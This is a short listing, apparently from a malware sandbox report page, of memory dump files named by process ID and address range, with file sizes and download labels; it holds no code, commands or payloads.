memory/3076-818-0x00007FFC59330000-0x00007FFC594A6000-memory.dmp

Filesize
1.5MB

Download
memory/3076-816-0x00007FFC64890000-0x00007FFC648A9000-memory.dmp

Filesize
100KB

Download
memory/3076-815-0x00007FFC5A8B0000-0x00007FFC5A8DD000-memory.dmp

Filesize
180KB

Download
memory/3076-814-0x00007FFC728E0000-0x00007FFC728EF000-memory.dmp

Filesize
60KB

Download
memory/3140-265-0x0000015B12D00000-0x0000015B12D08000-memory.dmp

Filesize
32KB

Download
memory/3148-618-0x0000020E36A60000-0x0000020E36A68000-memory.dmp

Filesize
32KB

Download
memory/4308-93-0x00000157E3340000-0x00000157E3362000-memory.dmp

Filesize
136KB

Download
memory/4512-424-0x0000000000B40000-0x0000000000B4E000-memory.dmp

Filesize
56KB

Download
memory/4512-115-0x00000000002D0000-0x00000000002E0000-memory.dmp

Filesize
64KB

Download
memory/4512-615-0x000000001D6C0000-0x000000001DA10000-memory.dmp

Filesize
3.3MB

Download